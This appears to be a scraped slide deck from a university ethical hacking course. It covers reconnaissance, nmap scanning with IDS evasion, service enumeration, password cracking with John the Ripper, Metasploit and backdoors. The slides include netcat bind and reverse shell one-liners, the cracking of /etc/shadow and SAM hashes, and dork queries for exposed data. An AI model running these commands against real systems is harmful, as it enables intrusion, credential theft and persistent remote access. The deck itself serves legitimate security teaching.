View
226
Download
2
Category
Preview:
Citation preview
Dr. Igor Santos
Security of Information Systems
Ethical hacking
2
Contents
¿What is Ethical Hacking? Phases
Information Gathering Network Mapping & Scanning Password Attacks Service Enumeration Vulnerabilities Identification &
Exploitation
3
¿What is Ethical Hacking?
4
Ethical Hacking
A method to evaluate the security of a system or a network of systems by simulating an intruder attack
It shows the actual impact of a vulnerability through controled tests
It searchs for unknown vulnerabilities
5
Ethical Hacking
Information level White Box Black Box
¿Social Engineering?
¿Physical Security?
¿Dangerous Tests? Exploits DoS …
6
Information Gathering
7
Information Gathering
Gather information about the target before the attack Without (too much) contact As much information as possible The information can be very valuable in
the future
More information = More probability of success in the attack
8
Information Gathering
Information we search for: Names and/or Positions of workers E-mail addresses User names Public Addresses, Domains or URLs Used Software and Technologies Internal addresses or URLs Internal PATHs Data about the system configuration
9
Information Gathering
Client and supplier names Physical Location Telephone Number …
Iterative process When information is found, new
searches are performed
10
Information Gathering
Sources Search Engines DNS servers Whois servers Metadata Social Networks P2P networks …
11
Information Gathering Types
Passive Methods The target is not contacted directly ▪ Search Engines▪ Whois▪ …
Active Methods It leaves some trace in the target▪ DNS zone transfer▪ Web site Mirroring▪ …
12
Information Gathering Techniques
Internet Service Registration (whois) Information about IP record and
maintenance
Search Engines Gather public information from
company and workers web sites
13
Information Gathering Techniques
DNS queries Identification of hosts by DNS querying
Web site analysis Intentionally published information, that
may suppose a risk for the security
14
Information Gathering Techniques
New sources!!! Social Networks Metadata P2P networks Work searching websites
15
Search Engines - Google
Google Hacking: Search in Google sensitive information, usually with malicious goals
Johnny Long Google Hacking For Penetration Testers http://www.hackersforcharity.org/ghdb/▪ No mantenida
http://www.exploit-db.com/google-dorks/▪ Continuación!!! (9 nov. 2010)
Cheat-sheet
http://www.sans.org/mentor/GoogleCheatSheet.pdf
16
Search Engines - Google
¿What to look for? Vulnerable applications (e.g.,:
inurl:eStore/index.cgi?) Error Messages (e.g.,: “Warning:
mysql_query()” “invalid query”) Files with sensitive information (e.g.,:
filetype:sql “insert into”) Websites with private reports (e.g.,:
intitle:”Nessus Scan Report”) Web server versions (e.g.,: “Microsoft-IIS/*
server at”, intitle:index.of)
17
Search Engines - Shodan
http://www.shodanhq.com/ A “diferent” search engine If finds systems by performing searches
based on the banner responses▪ Computer search engine
Filters: http://www.shodanhq.com/help/filters
Examples:▪ net:130.206.139.0/24▪ port:22 country:ES
18
Search Engines - Netcraft
Netcraft (http://news.netcraft.com) It shows the following domain
information given a domain▪ OS version. ▪ Web server version▪ Uptime
19
Search Engines
Countermeasures To properly configure the “robots.txt” file▪ This file indicates to search engines what the
must NOT index Periodically audit the web site with these
techniques in order to check that there is no access to sensitive information
20
Social Networks
¿Who does have a profile in Facebook or LinkedIn?
¿Do we know how to handle privacity in social networks?
Social Engineering Create a fake profile in order to obtain access
to private profiles = ¡Lot of information!
Social Network Search Engines▪ http://www.123people.com/▪ http://www.pipl.com/
21
Social Networks
Countermeasures Limit the presence in social networks Don’t publish too much Don’t publish automatically Don’t accept every friendship request
(we may not be the final victim but an attack vector)
22
Metadata
Hidden information regarding a document Author Used Application Date of Creation Camera Model (images) E-mail Addresses …
They enhance the information present in a document
23
Metadata - FOCA
A tool that started by being a metadata extractor and analyzer, now is more than that: Document panel: Searches several types of
documents in Google, Bing and Exaled DNS Search Panel : It uses different
techniques to obtain more domain namesCountermeasures: Metashield
Protector It cleans the metadata from documents
24
Network Mapping & Scanning
25
Network Mapping & Scanning
Several techniques Host discovery Port scanning IDS (Intrusion Detection System) evasion Service and OS identification
(fingerprinting)
26
Network Mapping & ScanningNmap
Tool for network exploration and security auditing
nmap [ <Scan Type> .][<Options> ] { <target specificication> }
Options▪ Scan type: -sS, -sX, -sU, …▪ -p <ports>: ports to scan (separated by a comma
or “-” for range) (to scan all of them –p 0-65535)
27
Network Mapping & Scanning
Zenmap Front-end for nmap It draws a network map with the results Predefined scans
28
Network Mapping & Scanning
Manualhttp://nmap.org/man/es/man-briefoptions.html
Cheat sheethttp://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf
Bookhttp://nmap.org/book/
29
Host Discovery
Identify online systems First step for network mapping
Classic method using ping ICMP echo request Alive systems respond to ICMP echo reply
It is also possible to send TCP packets and wait for the response of the online
ARP Ping in local networks
30
Host Discovery
Nmap ping (-sP) ICMP echo request & ICMP timestamp
request TCP ACK packet port 80 TCP SYN packet port 443
Example:nmap –sP 192.168.1.1
31
Port Scanning
One of the most widespread hacking techniques Nmap en Hollywood
http://nmap.org/movies.html
A computer executes several services that listen in tcp/udp ports
By means of scanning, we can locate open ports
32
TCP Port Scanning - TCP Connect scan
TCP Connect scan A TCP connection is established with
the destination port (Three-Way Handshake)
A very reliable method to determine the port state
Simple and easy to detect▪ Generates too much noise
nmap –sT <IP> -p <ports>
33
TCP Port Scanning - TCP Connect scan
Open port
34
TCP Port Scanning - TCP Connect scan
Closed port
35
TCP Port Scanning - TCP Connect scan
Filtered port
36
TCP Port Scanning - SYN Scan
SYN scan If a port listening is found, the full
connection is not established▪ A RST is sent to finalize it
Because Three-Way Handshake is not completed, a lot of system don’t log the connection attempt
A IDS can easily detect it Quick and realiable
nmap –sS <IP> -p <ports>
37
TCP Port Scanning - SYN Scan
Open port
38
TCP Port Scanning - SYN Scan
Closed port
39
TCP Port Scanning - SYN Scan
Filtered port
40
UDP Port Scanning
UDP is a protocal not connection oriented Closed ports return the packet “ICMP
destination unreachable”
If the ICMP traffic is filtered the responsed are not retrieved for the closed ports The port state cannot be determined
conclusively
nmap –sU <IP> -p <ports>
41
UDP Port Scanning
Open/Filtered port
42
UDP Port Scanning
Closed port
43
IDS evasion
Techniques to avoid IDS/IPS Use of fragmented packets▪ Distribution of an IP packet between various
data blocksnmap -sS -f <IP> -p <ports>
Spoofing of origin IPs to emulate multiple attackers▪ Hiding our own IP (attacker)nmap –sS –D <IP1,IP2,…IPN> <attacked_IP> -p <ports>
44
Fingerprinting
Service Fingerprinting Identification of the service listening
in a port TCP/UDPnmap –sV <IP> -p <port>
O.S. Fingerprinting Identification of the Operative
Systemnmap –O <IP>
45
Contramedidas escaneo de red
Disable unnecessary services Close ports
Firewall / IDS / IPS ICMP traffic filtering
46
Enumeration
47
Enumeration
Get information through a network service
What information? System user names Email addresses other systems ...
48
Enumeration
Services FTP: anonymous / Ftp-user-enum TFTP: ¡without authentication! SMTP: VRFY y EXPN commands → smtpenum DNS: Direct/Reverse Lookup y zone transfer HTTP: banner grabbing RPC: edump, rpcdump, rpcinfo NETBIOS: samrdump SNMP: snmpwalk, snmpheck LDAP: Brute force by means of the Guest user
49
Countermeasures - enumeration
Maintain the services updated Disable unnecessary services
50
ATAQUES A CONTRASEÑAS
Passwords Attacks
51
Password Guessing
It is unknown some or all the necessary data to authenticate User (if the Information Gathering phase
has been correctly done, we will have several system users)
Password The password file is known, but it is
encrypted Words are test until the correct one is
found
52
Password Guessing
Systems store a password Hash They do not store clear users'
passwords One-way encryption function It cannot be decrypted▪ http://en.wikipedia.org/wiki/Cryptographic_ha
sh_function
53
Password Guessing
During a pentest we will collect password hashes Bad configurations Successful intrusion
With administrative permission is possible to dump the hashes of the passwords of system users Windows -> SAM Unix -> / etc / passwd, / etc / shadow
54
Attack Types
Dictionary It is based on a list of user names or
passwords Common Words Terms related to the audited Try until the right one is found It should be on the list! Success depends on how good and / or
extensive is the dictionary / pentest / passwords / wordlists
55
Attack Types
Hybrid It uses a dictionary, but variations are
also introduced Examples Try dictionary words in lowercase and
uppercase A is changed by 4, S by 5, E by 3, ...
56
Attack Types
Brute Force Usernames or passwords are generated
within a rank and given a character set▪ Eg max 8 characters [A-Za-z]
57
John the Ripper
Password cracking tool Able to break several algorithms
DES MD5 SHA-1 LM (Lan Manager) ...
You can save a session for later cracking
58
John the Ripper
Single mode Quick test Difficult to have success It uses typical passwords and some
variations
john --single <password_file>
59
John the Ripper
Wordlist Mode It tests with a dictionary file Quick Hybrid attack: --rulesjohn --wordlist=<dictionary> <password_file>
Dictionaries/pentest/passwords/wordlists/
60
John the Ripper
Incremental Mode It tries all possible combinations of
passwords (Brute Force)▪ Only letters (--incremental:alpha)▪ Only numbers (--incremental:digits)▪ Letters, numbers and some special characters (--incremental:lanman)▪ All characters (--incremental:all)
john --incremental:[mode] <password_file>
61
John the Ripper
Show cracked hashes john --show /etc/shadow
62
Other techniques
Shoulder surffing Social Engineering Sniffing
Capture the session logins Physical access
Bypass -> konboot Password cracking 0phcrack live cd (Rainbow
Tables)
63
Vulnerabilities Identification & Exploitation
64
Vulnerabilities Identification & Exploitation
Terminology Vulnerability Exploit (client-side, server-side, …) 0-day exploit Payload CVE (Common Vulnerabilities and
Exposures): http://cve.mitre.org/
65
Lots of vulnerabilities types: Configuration (not design) Input validation Directory Jump Command Injection SQL Injection Cross-site scripting (XSS) Buffer overflow …
Vulnerabilities Identification & Exploitation
66
Vulnerability Search Security Focus▪ http://www.securityfocus.com/vulnerabilities
National Vulnerability Database▪ http://web.nvd.nist.gov/view/vuln/search
CERT▪ http://cert.inteco.es/vulnSearch/Current_News/
Vulnerabilities_1/vulnerability_search/?postAction=getVulns
Microsoft Security Bulletins▪ http://www.microsoft.com/spain/technet/securi
ty/bulletin/ms10-oct.mspx Scanners: Secunia, Nessus, etc.
Vulnerabilities Identification & Exploitation
67
Exploits Search Exploit Database▪ Milw0rm continuation.▪ http://www.exploit-db.com/
Others▪ http://www.securiteam.com/exploits▪ http://securityvulns.com/exploits▪ http://www.web-hack.ru/exploit▪ http://tarantula.by.ru/localroot
Vulnerabilities Identification & Exploitation
68
Metasploit Framework for vulnerbility explotation It help in the development of new
exploits It allows to define▪ What exploit is going to be used▪ Which payload is going to be launched
lanzará▪ Meterpreter: advanced payload without disk access
(DLL Injection) → less forensics evidences.
▪ How is going to be coded (avoiding IDS, etc.)
Vulnerabilities Identification & Exploitation
69
Mantaining the access– Backdoors Tiny Shell: Unix backdoor Hydrogen: backdoor from
Immunitysec▪ It includes robust encryption and traffic
hiding Radmin: Windows backdoor▪ A remote desktop like connection. Very
easy to use and with a lot of functions
Vulnerabilities Identification & Exploitation
70
Netcat: it can be used as backdoor▪Victim (server): nc -lp 4444 –e cmd.exe▪Attacker (client): nc –vv <IP victim> 4444
▪ Also “reverse shell”:▪Attacker (client): nc –vvlp 4444▪Victim (server): nc –vv <IP attacker> 4444 –e cmd.exe
Vulnerabilities Identification & Exploitation
71
References
Images RTVE http://www.flickr.com/photos/anonymous9000/26
63311366 The Matrix, Warner Bros. http://www.flickr.com/photos/venosdale/4412225
367 http://www.flickr.com/photos/melancon/22837190
35
Recommended